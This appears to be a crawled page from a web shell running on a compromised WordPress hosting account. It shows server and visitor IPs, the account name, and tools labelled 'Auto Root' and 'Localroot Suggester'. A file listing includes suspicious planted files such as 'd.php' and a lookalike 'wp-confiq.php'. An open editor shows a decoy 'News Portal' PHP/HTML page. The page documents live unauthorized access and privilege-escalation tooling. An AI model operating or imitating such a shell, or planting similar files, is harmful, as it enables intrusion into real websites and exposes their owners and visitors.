Linux premium82.web-hosting.com 4.18.0-553.44.1.lve.el8.x86_64 #1 SMP Thu Mar 13 14:29:12 UTC 2025 x86_64
LiteSpeed
Server IP : 185.61.154.194 & Your IP : 216.73.216.196
Domains :
Cant Read [ /etc/named.conf ]
User : evicodqw
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
home /
evicodqw /
llblegalmarketing.co.uk /
Delete
Unzip
Name
Size
Permission
Date
Action
.well-known
[ DIR ]
drwxr-xr-x
2025-06-19 07:56
imgs
[ DIR ]
drwxr-xr-x
2025-07-10 07:55
wp-admin
[ DIR ]
drwxr-xr-x
2025-07-05 14:33
wp-content
[ DIR ]
drwxr-xr-x
2025-07-05 14:33
wp-includes
[ DIR ]
dr-xr-xr-x
2025-07-07 07:36
.htaccess
564
B
-r--r--r--
2025-07-10 08:40
.litespeed_flag
297
B
-rw-r--r--
2025-07-13 01:32
d.php
19
B
-rw-r--r--
2025-07-12 11:13
dim.txt
19
B
-rw-r--r--
2025-07-12 11:14
error_log
380.21
KB
-rw-r--r--
2025-07-02 23:28
google859da433f7f5a2b3.html
53
B
-rw-r--r--
2025-07-10 01:32
grow-a-digital-marketing-agency.jpg
178.96
KB
-rw-r--r--
2023-08-25 23:55
index.html
1.95
KB
-rw-r--r--
2025-07-12 11:14
index.php
5.33
KB
-rw-r--r--
2025-07-10 08:40
wp-blog-header.php
2.73
KB
-rw-r--r--
2025-06-23 02:50
wp-confiq.php
59.05
KB
-rw-r--r--
2025-07-10 08:39
wp-cron.php
2.73
KB
-rw-r--r--
2025-06-23 02:50
Save
Rename
<!DOCTYPE html> <html lang="en"> <head> <meta charset="UTF-8" /> <meta name="viewport" content="width=device-width, initial-scale=1.0" /> <title><?php echo $_SERVER['HTTP_HOST']; ?> - News Portal</title> <link rel="icon" href="https://s.w.org/favicon.ico" type="image/x-icon" /> <style> @import url('https://fonts.googleapis.com/css2?family=Roboto:wght@400;700&display=swap'); * { margin: 0; padding: 0; box-sizing: border-box; font-family: 'Roboto', sans-serif; } body { background: #f9f9f9; color: #333; line-height: 1.6; } header { background: #0073aa; color: white; padding: 20px; text-align: center; } header h1 { font-size: 22px; margin-bottom: 10px; } nav { background: #005f8d; display: flex; justify-content: center; padding: 10px 0; flex-wrap: wrap; } nav a { color: white; margin: 0 15px; text-decoration: none; font-weight: bold; font-size: 14px; } .container { padding: 20px; max-width: 1000px; margin: auto; } .post { background: white; border-radius: 8px; padding: 20px; margin-bottom: 20px; box-shadow: 0 0 8px rgba(0,0,0,0.05); transition: transform 0.2s; } .post:hover { transform: scale(1.01); } .post h2 { margin-bottom: 10px; color: #0073aa; } .post p { color: #555; margin-bottom: 10px; } .read-more { color: #0073aa; text-decoration: none; font-weight: bold; } .read-more:hover { text-decoration: underline; } .date { font-size: 14px; color: #999; margin-bottom: 5px; } .pagination { text-align: center; margin-top: 20px; } .pagination button { margin: 0 5px; padding: 8px 12px; border: none; background: #0073aa; color: white; cursor: pointer; border-radius: 5px; } .pagination button:disabled { background: #ccc; cursor: not-allowed; } footer { background: #333; color: white; text-align: center; padding: 20px 0; margin-top: 40px; font-size: 14px; } @media (max-width: 600px) { nav { flex-direction: column; } nav a { margin: 10px 0; } header h1 { font-size: 18px; } } </style> </head> <body> <header> <h1><?php echo strtoupper($_SERVER['HTTP_HOST']); ?> News</h1> <nav> <a href="#">Home</a> <a href="#">World</a> <a href="#">Politics</a> <a href="#">Tech</a> <a href="#">Contact</a> </nav> </header> <div class="container"> <div id="posts"></div> <div class="pagination"> <button id="prevBtn" onclick="prevPage()">Prev</button> <button id="nextBtn" onclick="nextPage()">Next</button> </div> </div> <footer> © <?php echo date("Y"); ?> <?php echo $_SERVER['HTTP_HOST']; ?>. All rights reserved. </footer> <script> const postsData = [ { title: "NASA Plans Crewed Mars Mission by 2035", date: "Jul 11, 2025", intro: "The Red Planet is closer than ever.", content: "NASA has revealed an ambitious roadmap..." }, { title: "Apple Unveils Vision Pro Mixed Reality Headset", date: "Jul 10, 2025", intro: "Apple breaks new ground.", content: "Apple has entered the VR/AR space..." }, { title: "Amazon Launches Drone Delivery in Suburbs", date: "Jul 9, 2025", intro: "30-minute delivery takes flight.", content: "Amazon Prime Air is now operational..." }, { title: "Markets Surge After Inflation Cools", date: "Jul 8, 2025", intro: "Wall Street celebrates.", content: "Markets in NY, London, Tokyo rise..." }, { title: "ChatGPT Passes U.S. Bar Exam", date: "Jul 7, 2025", intro: "AI enters the legal arena.", content: "OpenAI's ChatGPT has passed..." }, { title: "NATO & Russia Maneuvers Raise Tensions", date: "Jul 6, 2025", intro: "Eastern Europe under pressure.", content: "Military exercises intensify..." }, { title: "Bitcoin Breaks $80k In Surprise Rally", date: "Jul 5, 2025", intro: "Crypto investors cheer.", content: "Bitcoin reaches new highs..." }, { title: "Meta Launches AI Avatars for Meetings", date: "Jul 4, 2025", intro: "Virtual meetings evolve.", content: "Meta's avatars gain realism..." }, { title: "Europe Hit by Severe Heatwave", date: "Jul 3, 2025", intro: "Records shattered.", content: "Southern Europe is facing..." }, { title: "China's Economy Grows Amid Tech Surge", date: "Jul 2, 2025", intro: "AI boosts growth.", content: "China's GDP beats expectations..." } ]; let currentPage = 1; const postsPerPage = 5; function renderPosts() { const start = (currentPage - 1) * postsPerPage; const end = start + postsPerPage; const visiblePosts = postsData.slice(start, end); const container = document.getElementById("posts"); container.innerHTML = ""; visiblePosts.forEach(post => { container.innerHTML += ` <div class="post"> <div class="date">${post.date}</div> <h2>${post.title}</h2> <p><strong>${post.intro}</strong></p> <p>${post.content}</p> <a class="read-more" href="#">Continue reading →</a> </div> `; }); document.getElementById("prevBtn").disabled = currentPage === 1; document.getElementById("nextBtn").disabled = end >= postsData.length; } function prevPage() { if (currentPage > 1) { currentPage--; renderPosts(); } } function nextPage() { if ((currentPage * postsPerPage) < postsData.length) { currentPage++; renderPosts(); } } window.onload = renderPosts; </script> </body> </html>